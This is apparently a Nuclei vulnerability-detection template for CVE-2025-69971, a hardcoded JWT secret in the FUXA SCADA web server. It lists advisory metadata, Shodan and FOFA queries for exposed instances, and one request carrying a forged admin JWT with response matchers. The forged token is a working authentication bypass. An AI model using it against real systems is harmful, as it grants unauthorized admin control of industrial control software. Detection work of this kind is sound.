id: CVE-2025-69971

info:
  name: FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass
  author: trader642
  severity: critical
  description: |
    FUXA v1.2.7 contains a hardcoded credentials vulnerability caused by use of a hard-coded secret key in server/api/jwt-helper.js, letting remote attackers forge admin tokens and bypass authentication, exploit requires no special conditions.
  impact: |
    Remote attackers can bypass authentication and gain full administrative access.
  remediation: |
    Update to the latest version that removes hard-coded credentials.
  reference:
    - https://github.com/frangoteam/FUXA/security/advisories/GHSA-32cc-x95p-fxcg
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69971
    - https://github.com/frangoteam/FUXA/blob/master/server/api/jwt-helper.js
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-69971
    epss-score: 0.04529
    epss-percentile: 0.89239
    cwe-id: CWE-321
    cpe: cpe:2.3:a:frangoteam:fuxa:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: frangoteam
    product: fuxa
    fofa-query: title="FUXA"
    shodan-query: title:"FUXA"
  tags: cve,cve2025,fuxa,frangoteam,auth-bypass,hardcoded-credentials,jwt,scada,vuln

http:
  - raw:
      - |
        GET /api/project HTTP/1.1
        Host: {{Hostname}}
        x-access-token: eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJpZCI6ICJhZG1pbiIsICJncm91cHMiOiBbLTEsIDI1NV0sICJpYXQiOiAxNzAwMDAwMDAwLCAiZXhwIjogMjAwMDAwMDAwMH0.WEOs0b8pyK8Q7IoQtN3fpc0x0KlAKMAm78oPR9zg2Cg

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "\"hmi\"", "\"server\"", "FuxaServer")'
        condition: and
# digest: 4b0a00483046022100a11e97877ab6542004b56bff541728d5b567e2b70a3e2fb236c326545dbe69bd022100a05002685f2cd7079490ca68e0761182771f48675e32d49bce7081578b7da263:922c64590222798bb761d5b6d8e72950